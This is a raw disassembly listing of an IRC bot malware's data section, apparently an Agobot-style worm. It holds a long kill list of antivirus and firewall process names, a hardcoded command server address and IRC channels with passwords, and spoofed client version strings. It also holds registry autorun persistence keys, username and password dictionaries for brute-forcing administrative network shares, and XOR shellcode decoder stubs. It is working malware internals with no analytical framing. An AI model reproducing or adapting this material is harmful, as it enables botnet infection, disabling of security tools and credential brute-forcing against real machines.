dd offset aPspf_exe ; "PSPF.EXE"
dd offset aPurge_exe ; "PURGE.EXE"
dd offset aPussy_exe ; "PUSSY.EXE"
dd offset aPview95_exe ; "PVIEW95.EXE"
dd offset aQconsole_exe ; "QCONSOLE.EXE"
dd offset aQserver_exe ; "QSERVER.EXE"
dd offset aRapapp_exe ; "RAPAPP.EXE"
dd offset aRav7_exe ; "RAV7.EXE"
dd offset aRav7win_exe ; "RAV7WIN.EXE"
dd offset aRav8win32eng_e ; "RAV8WIN32ENG.EXE"
dd offset aRay_exe ; "RAY.EXE"
dd offset aRb32_exe ; "RB32.EXE"
dd offset aRcsync_exe ; "RCSYNC.EXE"
dd offset aRealmon_exe ; "REALMON.EXE"
dd offset aReged_exe ; "REGED.EXE"
dd offset aRegedit_exe ; "REGEDIT.EXE"
dd offset aRegedt32_exe ; "REGEDT32.EXE"
dd offset aRescue_exe ; "RESCUE.EXE"
dd offset aRescue32_exe ; "RESCUE32.EXE"
dd offset aRrguard_exe ; "RRGUARD.EXE"
dd offset aRshell_exe ; "RSHELL.EXE"
dd offset aRtvscan_exe ; "RTVSCAN.EXE"
dd offset aRtvscn95_exe ; "RTVSCN95.EXE"
dd offset aRulaunch_exe ; "RULAUNCH.EXE"
dd offset aRun32dll_exe ; "RUN32DLL.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aRundll16_exe ; "RUNDLL16.EXE"
dd offset aRuxdll32_exe ; "RUXDLL32.EXE"
dd offset aSafeweb_exe ; "SAFEWEB.EXE"
dd offset aSahagent_exe ; "SAHAGENT.EXE"
dd offset aSave_exe ; "SAVE.EXE"
dd offset aSavenow_exe ; "SAVENOW.EXE"
dd offset aSbserv_exe ; "SBSERV.EXE"
dd offset aSc_exe ; "SC.EXE"
dd offset aScam32_exe ; "SCAM32.EXE"
dd offset aScan32_exe ; "SCAN32.EXE"
dd offset aScan95_exe ; "SCAN95.EXE"
dd offset aScanpm_exe ; "SCANPM.EXE"
dd offset aScrscan_exe ; "SCRSCAN.EXE"
dd offset aScrsvr_exe ; "SCRSVR.EXE"
dd offset aScvhost_exe ; "SCVHOST.EXE"
dd offset aSd_exe ; "SD.EXE"
dd offset aServ95_exe ; "SERV95.EXE"
dd offset aService_exe ; "SERVICE.EXE"
dd offset aServlce_exe ; "SERVLCE.EXE"
dd offset aServlces_exe ; "SERVLCES.EXE"
dd offset aSetupvameeval_ ; "SETUPVAMEEVAL.EXE"
dd offset aSetup_flowprot ; "SETUP_FLOWPROTECTOR_US.EXE"
dd offset aSfc_exe ; "SFC.EXE"
dd offset aSgssfw32_exe ; "SGSSFW32.EXE"
dd offset aSh_exe ; "SH.EXE"
dd offset aShellspyinstal ; "SHELLSPYINSTALL.EXE"
dd offset aShn_exe ; "SHN.EXE"
dd offset aShowbehind_exe ; "SHOWBEHIND.EXE"
dd offset aSmc_exe ; "SMC.EXE"
dd offset aSms_exe ; "SMS.EXE"
dd offset aSmss32_exe ; "SMSS32.EXE"
dd offset aSoap_exe ; "SOAP.EXE"
dd offset aSofi_exe ; "SOFI.EXE"
dd offset aSperm_exe ; "SPERM.EXE"
dd offset aSpf_exe ; "SPF.EXE"
dd offset aSphinx_exe ; "SPHINX.EXE"
dd offset aSpoler_exe ; "SPOLER.EXE"
dd offset aSpoolcv_exe ; "SPOOLCV.EXE"
dd offset aSpoolsv32_exe ; "SPOOLSV32.EXE"
dd offset aSpyxx_exe ; "SPYXX.EXE"
dd offset aSrexe_exe ; "SREXE.EXE"
dd offset aSrng_exe ; "SRNG.EXE"
dd offset aSs3edit_exe ; "SS3EDIT.EXE"
dd offset aSsgrate_exe ; "SSGRATE.EXE"
dd offset aSsg_4104_exe ; "SSG_4104.EXE"
dd offset aSt2_exe ; "ST2.EXE"
dd offset aStart_exe ; "START.EXE"
dd offset aStcloader_exe ; "STCLOADER.EXE"
dd offset aSupftrl_exe ; "SUPFTRL.EXE"
dd offset aSupport_exe ; "SUPPORT.EXE"
dd offset aSupporter5_exe ; "SUPPORTER5.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aSvchostc_exe ; "SVCHOSTC.EXE"
dd offset aSvchosts_exe ; "SVCHOSTS.EXE"
dd offset aSvshost_exe ; "SVSHOST.EXE"
dd offset aSvshost32_exe ; "SVSHOST32.EXE"
dd offset aUpd32_exe ; "UPD32.EXE"
dd offset aSweep95_exe ; "SWEEP95.EXE"
dd offset aSweepnet_sweep ; "SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE"
dd offset aSymproxysvc_ex ; "SYMPROXYSVC.EXE"
dd offset aSymtray_exe ; "SYMTRAY.EXE"
dd offset aSysedit_exe ; "SYSEDIT.EXE"
dd offset aSystem_exe ; "SYSTEM.EXE"
dd offset aSystem32_exe ; "SYSTEM32.EXE"
dd offset aSysupd_exe ; "SYSUPD.EXE"
dd offset aTaskmg_exe ; "TASKMG.EXE"
dd offset aTaskmo_exe ; "TASKMO.EXE"
dd offset aTaskmon_exe ; "TASKMON.EXE"
dd offset aTaumon_exe ; "TAUMON.EXE"
dd offset aTbscan_exe ; "TBSCAN.EXE"
dd offset aTc_exe ; "TC.EXE"
dd offset aTca_exe ; "TCA.EXE"
dd offset aTcm_exe ; "TCM.EXE"
dd offset aTds3_exe ; "TDS-3.EXE"
dd offset aTds298_exe ; "TDS2-98.EXE"
dd offset aTds2Nt_exe ; "TDS2-NT.EXE"
dd offset aTeekids_exe ; "TEEKIDS.EXE"
dd offset aTfak_exe ; "TFAK.EXE"
dd offset aTfak5_exe ; "TFAK5.EXE"
dd offset aTgbob_exe ; "TGBOB.EXE"
dd offset aTitanin_exe ; "TITANIN.EXE"
dd offset aTitaninxp_exe ; "TITANINXP.EXE"
dd offset aTracert_exe ; "TRACERT.EXE"
dd offset aTrickler_exe ; "TRICKLER.EXE"
dd offset aTrjscan_exe ; "TRJSCAN.EXE"
dd offset aTrjsetup_exe ; "TRJSETUP.EXE"
dd offset aTrojantrap3_ex ; "TROJANTRAP3.EXE"
dd offset aTsadbot_exe ; "TSADBOT.EXE"
dd offset aTvmd_exe ; "TVMD.EXE"
dd offset aTvtmd_exe ; "TVTMD.EXE"
dd offset aUndoboot_exe ; "UNDOBOOT.EXE"
dd offset aUpdat_exe ; "UPDAT.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpgrad_exe ; "UPGRAD.EXE"
dd offset aUtpost_exe ; "UTPOST.EXE"
dd offset aVbcmserv_exe ; "VBCMSERV.EXE"
dd offset aVbcons_exe ; "VBCONS.EXE"
dd offset aVbust_exe ; "VBUST.EXE"
dd offset aVbwin9x_exe ; "VBWIN9X.EXE"
dd offset aVbwinntw_exe ; "VBWINNTW.EXE"
dd offset aVcsetup_exe ; "VCSETUP.EXE"
dd offset aVet32_exe ; "VET32.EXE"
dd offset aVet95_exe ; "VET95.EXE"
dd offset aVettray_exe ; "VETTRAY.EXE"
dd offset aVfsetup_exe ; "VFSETUP.EXE"
dd offset aVirHelp_exe ; "VIR-HELP.EXE"
dd offset aVirusmdpersona ; "VIRUSMDPERSONALFIREWALL.EXE"
dd offset aVnlan300_exe ; "VNLAN300.EXE"
dd offset aVnpc3000_exe ; "VNPC3000.EXE"
dd offset aVpc32_exe ; "VPC32.EXE"
dd offset aVpc42_exe ; "VPC42.EXE"
dd offset aVpfw30s_exe ; "VPFW30S.EXE"
dd offset aVptray_exe ; "VPTRAY.EXE"
dd offset aVscan40_exe ; "VSCAN40.EXE"
dd offset aVscenu6_02d30_ ; "VSCENU6.02D30.EXE"
dd offset aVsched_exe ; "VSCHED.EXE"
dd offset aVsecomr_exe ; "VSECOMR.EXE"
dd offset aVshwin32_exe ; "VSHWIN32.EXE"
dd offset aVsisetup_exe ; "VSISETUP.EXE"
dd offset aVsmain_exe ; "VSMAIN.EXE"
dd offset aVsmon_exe ; "VSMON.EXE"
dd offset aVsstat_exe ; "VSSTAT.EXE"
dd offset aVswin9xe_exe ; "VSWIN9XE.EXE"
dd offset aVswinntse_exe ; "VSWINNTSE.EXE"
dd offset aVswinperse_exe ; "VSWINPERSE.EXE"
dd offset aW32dsm89_exe ; "W32DSM89.EXE"
dd offset aW9x_exe ; "W9X.EXE"
dd offset aWatchdog_exe ; "WATCHDOG.EXE"
dd offset aWebdav_exe ; "WEBDAV.EXE"
dd offset aWebscanx_exe ; "WEBSCANX.EXE"
dd offset aWebtrap_exe ; "WEBTRAP.EXE"
dd offset aWfindv32_exe ; "WFINDV32.EXE"
dd offset aWgfe95_exe ; "WGFE95.EXE"
dd offset aWhoswatchingme ; "WHOSWATCHINGME.EXE"
dd offset aWimmun32_exe ; "WIMMUN32.EXE"
dd offset aWinBugsfix_exe ; "WIN-BUGSFIX.EXE"
dd offset aWin32_exe ; "WIN32.EXE"
dd offset aWin32us_exe ; "WIN32US.EXE"
dd offset aWinactive_exe ; "WINACTIVE.EXE"
dd offset aWindow_exe ; "WINDOW.EXE"
dd offset aWindows_exe ; "WINDOWS.EXE"
dd offset aWininetd_exe ; "WININETD.EXE"
dd offset aWininit_exe ; "WININIT.EXE"
dd offset aWininitx_exe ; "WININITX.EXE"
dd offset aWinlogin_exe ; "WINLOGIN.EXE"
dd offset aWinmain_exe ; "WINMAIN.EXE"
dd offset aWinnet_exe ; "WINNET.EXE"
dd offset aWinppr32_exe ; "WINPPR32.EXE"
dd offset aWinrecon_exe ; "WINRECON.EXE"
dd offset aWinservn_exe ; "WINSERVN.EXE"
dd offset aWinssk32_exe ; "WINSSK32.EXE"
dd offset aWinstart_exe ; "WINSTART.EXE"
dd offset aWinstart001_ex ; "WINSTART001.EXE"
dd offset aWintsk32_exe ; "WINTSK32.EXE"
dd offset aWinupdate_exe ; "WINUPDATE.EXE"
dd offset aWkufind_exe ; "WKUFIND.EXE"
dd offset aWnad_exe ; "WNAD.EXE"
dd offset aWnt_exe ; "WNT.EXE"
dd offset aWradmin_exe ; "WRADMIN.EXE"
dd offset aWrctrl_exe ; "WRCTRL.EXE"
dd offset aWsbgate_exe ; "WSBGATE.EXE"
dd offset aWupdater_exe ; "WUPDATER.EXE"
dd offset aWupdt_exe ; "WUPDT.EXE"
dd offset aWyvernworksfir ; "WYVERNWORKSFIREWALL.EXE"
dd offset aXpf202en_exe ; "XPF202EN.EXE"
dd offset aZapro_exe ; "ZAPRO.EXE"
dd offset aZapsetup3001_e ; "ZAPSETUP3001.EXE"
dd offset aZatutor_exe ; "ZATUTOR.EXE"
dd offset aZonalm2601_exe ; "ZONALM2601.EXE"
dd offset aZonealarm_exe ; "ZONEALARM.EXE"
dd offset a_avp32_exe ; "_AVP32.EXE"
dd offset a_avpcc_exe ; "_AVPCC.EXE"
dd offset a_avpm_exe ; "_AVPM.EXE"
dd offset aHijackthis_exe ; "HIJACKTHIS.EXE"
dd offset aFAgobot_exe ; "F-AGOBOT.EXE"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
dd offset aMsconfig_exe ; "MsConfiG.exe"
dd offset aWuanclt_exe ; "WUANCLT.EXE"
dd offset aWuacrlt_exe ; "WUACRLT.EXE"
dd offset aWruaclt_exe ; "WRUACLT.EXE"
dd offset aWinssv_exe ; "winssv.exe"
dd offset aScguard_exe ; "scguard.exe"
dd offset aWuamgrd_exe ; "wuamgrd.exe"
dd offset aBling_exe ; "bling.exe"
dd offset aWinmp_exe ; "winmp.exe"
dd offset aHass_exe ; "hass.exe"
off_42F748 dd offset dword_4276EC ; DATA XREF: sub_409180+20E�r
dd offset off_4276E8
dd offset aFtp ; "FTP"
dd offset aHttp_0 ; "HTTP"
dword_42F758 dd 6F6C2E3Ah, 206E6967h, 3 dup(0)dword_42F76C dd 0 dd 6F6C2C3Ah, 206E6967h, 4 dup(0)
dd 6F6C213Ah, 206E6967h, 4 dup(0)
dd 6F6C403Ah, 206E6967h, 4 dup(0)
dd 6F6C243Ah, 206E6967h, 4 dup(0)
dd 6F6C253Ah, 206E6967h, 4 dup(0)
dd 6F6C5E3Ah, 206E6967h, 4 dup(0)
dd 6F6C263Ah, 206E6967h, 4 dup(0)
dd 6F6C2A3Ah, 206E6967h, 4 dup(0)
dd 6F6C2D3Ah, 206E6967h, 4 dup(0)
dd 6F6C2B3Ah, 206E6967h, 4 dup(0)
dd 6F6C2F3Ah, 206E6967h, 4 dup(0)
dd 6F6C3D3Ah, 206E6967h, 4 dup(0)
dd 6F6C3F3Ah, 206E6967h, 4 dup(0)
dd 6F6C273Ah, 206E6967h, 4 dup(0)
dd 6F6C603Ah, 206E6967h, 4 dup(0)
dd 6F6C7E3Ah, 206E6967h, 4 dup(0)
dd 6F6C203Ah, 206E6967h, 4 dup(0)
dd 65732E3Ah, 2074h, 4 dup(0)
dd 65732C3Ah, 2074h, 4 dup(0)
dd 6573213Ah, 2074h, 4 dup(0)
dd 6573403Ah, 2074h, 4 dup(0)
dd 6573243Ah, 2074h, 4 dup(0)
dd 6573253Ah, 2074h, 4 dup(0)
dd 65735E3Ah, 2074h, 4 dup(0)
dd 6573263Ah, 2074h, 4 dup(0)
dd 65732A3Ah, 2074h, 4 dup(0)
dd 65732D3Ah, 2074h, 4 dup(0)
dd 65732B3Ah, 2074h, 4 dup(0)
dd 65732F3Ah, 2074h, 4 dup(0)
dd 65735C3Ah, 2074h, 4 dup(0)
dd 65733D3Ah, 2074h, 4 dup(0)
dd 65733F3Ah, 2074h, 4 dup(0)
dd 6573273Ah, 2074h, 4 dup(0)
dd 6573603Ah, 2074h, 4 dup(0)
dd 65737E3Ah, 2074h, 4 dup(0)
dd 6573203Ah, 2074h, 4 dup(0)
dd 206C2E3Ah, 5 dup(0)
dd 206C213Ah, 5 dup(0)
dd 206C243Ah, 5 dup(0)
dd 206C253Ah, 5 dup(0)
dd 20782E3Ah, 5 dup(0)
dd 2078213Ah, 5 dup(0)
dd 2078243Ah, 5 dup(0)
dd 2078253Ah, 5 dup(0)
dd 64642E3Ah, 20736Fh, 4 dup(0)
dd 6464213Ah, 20736Fh, 4 dup(0)
dd 6464243Ah, 20736Fh, 4 dup(0)
dd 6464253Ah, 20736Fh, 4 dup(0)
dd 64752E3Ah, 70h, 4 dup(0)
dd 6475213Ah, 70h, 4 dup(0)
dd 6475243Ah, 70h, 4 dup(0)
dd 6475253Ah, 70h, 4 dup(0)
dd 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1
aNowAnIrcOperat db 'now an IRC Operator',0
dd 1, 6 dup(0)
dword_42FCB0 dd 1BBh ; sub_40FB4C+4CA�r
dword_42FCB4 dd 1BBh dword_42FCB8 dd 4DBh dword_42FCBC dd 45h ; sub_409848+47F0�r
dword_42FCC0 dd 4E20h ; sub_409848:loc_40E138�r
dword_42FCC4 dd 201h dword_42FCC8 dd 1 dword_42FCCC dd 1 dword_42FCD0 dd 1 ; sub_40FB4C:loc_40FE7F�r
byte_42FCD4 db 2Eh ; DATA XREF: sub_402C54:loc_402C60�r
; sub_409848+7A4�r ...
align 4
dword_42FCD8 dd 6 ; sub_410DF8+51�r ...
dword_42FCDC dd 1 ; sub_409848+25D�r ...
dword_42FCE0 dd 1 ; sub_409848+257�r
aBot013 db 'Bot013',0 ; DATA XREF: sub_409848+329B�o
; sub_409848:loc_40E9C4�o ...
align 4
aBot0_013 db '[Bot 0.013]',0 ; DATA XREF: sub_409848:loc_40ED49�o
aN3m3s1s db 'n3m3s1s',0 ; DATA XREF: sub_409848+4E97�o
; sub_409848+614D�o ...
a217_170_244_2 db '217.170.244.2',0 ; DATA XREF: sub_40FB4C+3FF�o
; sub_40FB4C+4BF�o
align 10h
aParadise db '#paradise',0 ; DATA XREF: sub_40FB4C+41B�o
; sub_40FB4C+4D1�o
align 4
aTroopers db 'troopers',0 ; DATA XREF: sub_40FB4C+432�o
; sub_40FB4C+4E3�o
align 4
byte_42FD28 db 38h ; DATA XREF: sub_40FB4C:loc_410046�r
; sub_40FB4C+509�o
db 32h, 2Eh, 31h
dd 392E3431h, 322E30h
dword_42FD34 dd 72617023h, 73696461h, 65haTroopers_0 db 'troopers',0 ; DATA XREF: sub_40FB4C+52D�o
align 4
byte_42FD4C db 65h ; DATA XREF: sub_401141+63�o
; sub_401141+18B�o ...
db 71h, 63h, 79h
dd 33666C6Eh, 78652E32h, 65h
dword_42FD5C dd 2E79656Bh, 747874haNetworkHostSer db 'Network Host Service',0 ; DATA XREF: sub_40214F+B�o
align 4
aSoul db '[SOUL]',0 ; DATA XREF: sub_410DF8+12�o
align 4
aSysconfig_dat db 'sysconfig.dat',0
align 4
aIx db '+ix',0 ; DATA XREF: sub_409848+62CC�o
aMurders db '#murders',0 ; DATA XREF: sub_409848+4591�o
; sub_409848+5FC7�o
align 4
aHell_0 db '#hell',0 ; DATA XREF: sub_409848+1DCD�o
align 4
aSniffing db '#sniffing',0 ; DATA XREF: sub_409848+1C08�o
align 4
off_42FDB8 dd offset a@celestial_org ; DATA XREF: sub_409848+61CB�r
; "*@celestial.org"
align 10h
off_42FDC0 dd offset aMircV6_12Khale ; DATA XREF: sub_409848+926�r
; "mIRC v6.12 Khaled Mardam-Bey"
dd offset aMircV6_03Khale ; "mIRC v6.03 Khaled Mardam-Bey"
dd offset aBitchx74p2ByPa ; "BitchX-74p2+ by panasync - CYGWIN32/95 "...
dd offset a__Argon1gBitch ; "..(argon/1g) :bitchx-75 : Keep it to yo"...
dd offset aBitchx70alpha1 ; "BitchX-70alpha14+tcl by panasync - Linu"...
dd offset aBitchx1_0c19By ; "BitchX-1.0c19+ by panasync - FreeBSD 4."...
dd offset aBitchx74p21_3f ; "BitchX-74p2+1.3f/SunOS 5.6 :(c)rackrock"...
dd offset aBitchx1_0c18By ; "BitchX-1.0c18+ by panasync - IRIX 6.5.1"...
dd offset aBx_75p1Linux2_ ; "[bx.75p1] linux 2.0.36 [embryonic.22b3]"...
dd offset aIrciiEpic4pr_0 ; "ircII EPIC4pre2 Linux 2.0.34 - Accept n"...
dd offset aIrciiEpic4pre2 ; "ircII EPIC4pre2 SunOS 5.6 - cypher(beta"...
dd offset aIrcii2_9Bitchx ; "ircII 2.9-BitchX-60 Linux 1.2.8 :bitZ%s"...
dd offset aIrcii2_8_2Suno ; "ircII 2.8.2 SunOS 5.6 :ircii 2.8: almos"...
dd offset aIrcii2_9_baseO ; "ircII 2.9_base OSF1 V4.0 :ircii 2.8: al"...
dd offset aXchat1_8_10Lin ; "xchat 1.8.10 Linux 2.4.25p1mp [i686/501"...
dd offset aIrcn7_277_0Eve ; "ircN 7.27 + 7.0 - everyone i know goes "...
dd offset aIrssiV0_8_4Run ; "irssi v0.8.4 - running on Linux i686"
dd offset aMirc32V5_71K_m ; "mIRC32 v5.71 K.Mardam-Bey"
dd offset aMirc32V5_82K_m ; "mIRC32 v5.82 K.Mardam-Bey"
dd offset aMirc32V6_01K_m ; "mIRC32 v6.01 K.Mardam-Bey"
dd offset aMirc32V6_03K_m ; "mIRC32 v6.03 K.Mardam-Bey"
dd offset aMirc32V6_12K_m ; "mIRC32 v6.12 K.Mardam-Bey"
dd offset aMircV5_71K_mar ; "mIRC v5.71 K.Mardam-Bey"
dd offset aMircV5_82K_mar ; "mIRC v5.82 K.Mardam-Bey"
dd offset aMircV6_01K_mar ; "mIRC v6.01 K.Mardam-Bey"
dd offset aMircV6_03K_mar ; "mIRC v6.03 K.Mardam-Bey"
dd offset aMircV6_1K_mard ; "mIRC v6.1 K.Mardam-Bey"
dd offset aMircV6_01K_mar ; "mIRC v6.01 K.Mardam-Bey"
dd offset aMircV6_03K_mar ; "mIRC v6.03 K.Mardam-Bey"
dd offset aMircV6_10K_mar ; "mIRC v6.10 K.Mardam-Bey"
dd offset aMircV6_12K_mar ; "mIRC v6.12 K.Mardam-Bey"
dd offset aMircV6_14K_mar ; "mIRC v6.14 K.Mardam-Bey"
dd offset aMirc32V1_0K_ma ; "mIRC32 v1.0 K .Mardam-Bey"
dd offset aEggdropV1_6_15 ; "eggdrop v1.6.15"
dd offset aEggdropV1_6_13 ; "eggdrop v1.6.13"
dd offset aStormbot_tcl3_ ; "StormBot.TCL 3.1.beta.2.10 by Xone & Do"...
dd offset aCBasedIrcClien ; "C++ based IRC Client by Jumpincow/shaxx"...
dd offset aHydraircV0_3_1 ; "HydraIRC v0.3.133-Test (14/March/2004) "...
dd offset aWsirc2_03RCopy ; "WSIRC 2.03-R - CopyRight 1994, 1995 Cae"...
dd offset aIrcn6_03ForMir ; "ircN 6.03 for mIRC - are we being punis"...
dd offset aIrcn7_0rc_67_0 ; "ircN 7.0rc.6 + 7.0rc.5 + 7.0rc.4 for mI"...
dd offset aOsiris1cBitchx ; "osiris-1c/bitchx-75p1 + autobot(bx) p3x"...
dd offset aXirconB4Doot_3 ; "xircon[b4] + doot.3b[pawt] be-two + ano"...
dd offset aAmircAmigaos2_ ; "AmIRC/AmigaOS 2.0.4 by Oliver Wagner <o"...
dd offset aQuarterdeckGlo ; "Quarterdeck Global Chat 1.2.9 for Macin"...
dd offset aIrcle3_0b10UsP ; "Ircle 3.0b10 US PPC 12/15/1997 21:07:34"...
dd offset aEggdrop1_3_24i ; "Eggdrop 1.3.24i (c)1997 Robey Pointer"
dd offset aJpilotIrcJavaC ; "JPilot IRC Java Client 2.32"
dword_42FE80 dd 312E3238h, 362E3431h, 35322E34h, 31hdword_42FE90 dd 15h aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: .text:off_42E4F4�o
align 4
db 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_411329+23�o
; sub_411650+23�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_411329+D5�o
; sub_411650+D5�o
align 10h
off_42FF40 dd offset aAdministrato_0 ; DATA XREF: .text:00416362�r
; .text:0041636A�o
; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
align 10h
dword_42FF90 dd 422B02h dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_0 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_0 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer ; "server"
dd offset aRoot ; "root"
dd offset aNull_0 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
off_43005C dd offset aHomeuser ; DATA XREF: .text:off_4307A8�o
; .text:00430DF0�o
; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 10h
dword_4301C0 dd 10h ; sub_409848+807�r ...
align 8
dword_4301C8 dd 736E6F63h dd 74h, 0
dword_4301D4 dd 1 off_4301D8 dd offset sub_410DF8 ; DATA XREF: sub_411114+6C�r
aLetter db 'letter',0
align 8
dd 2, 410E56h, 706D6F63h, 2 dup(0)
dd 3, 410EA3h, 6E756F63h, 797274h, 0
dd 4, 410F12h, 736Fh, 2 dup(0)
dd 5, 410F87h
dword_43022C dd 1D4C0h off_430230 dd offset aIpc_0 ; DATA XREF: sub_411329:loc_4114DF�r
; sub_411329+1C4�r ...
; "IPC$"
dword_430234 dd 0 dd offset aAdmin_0 ; "ADMIN$"
dd 0
dd offset aC_3 ; "C$"
dd offset aC_2 ; "C:\\"
dd offset aD_3 ; "D$"
dd offset aD_2 ; "D:\\"
; ---------------------------------------------------------------------------
loc_430250: ; DATA XREF: sub_411FED+C0�o
jmp short loc_430254
; ---------------------------------------------------------------------------
loc_430252: ; CODE XREF: .text:loc_430254�p
jmp short loc_430259
; ---------------------------------------------------------------------------
loc_430254: ; CODE XREF: .text:loc_430250�j
call loc_430252
loc_430259: ; CODE XREF: .text:loc_430252�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 66h, 0B9h
word_43025E dw 0FFFFh ; DATA XREF: sub_411FED:loc_4120A0�w
db 80h, 73h, 0Eh
byte_430263 db 0FFh ; DATA XREF: sub_411FED+BA�w
dd 0F9E243h
; ---------------------------------------------------------------------------
loc_430268: ; DATA XREF: sub_411FED+9C�o
jmp short loc_43026C
; ---------------------------------------------------------------------------
loc_43026A: ; CODE XREF: .text:loc_43026C�p
jmp short loc_430271
; ---------------------------------------------------------------------------
loc_43026C: ; CODE XREF: .text:loc_430268�j
call loc_43026A
loc_430271: ; CODE XREF: .text:loc_43026A�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 0B1h
byte_430275 db 0FFh ; DATA XREF: sub_411FED+A1�w
dw 7380h
db 0Ch
byte_430279 db 0FFh ; DATA XREF: sub_411FED+A7�w
dw 0E243h
dd 0F9h
dword_430280 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
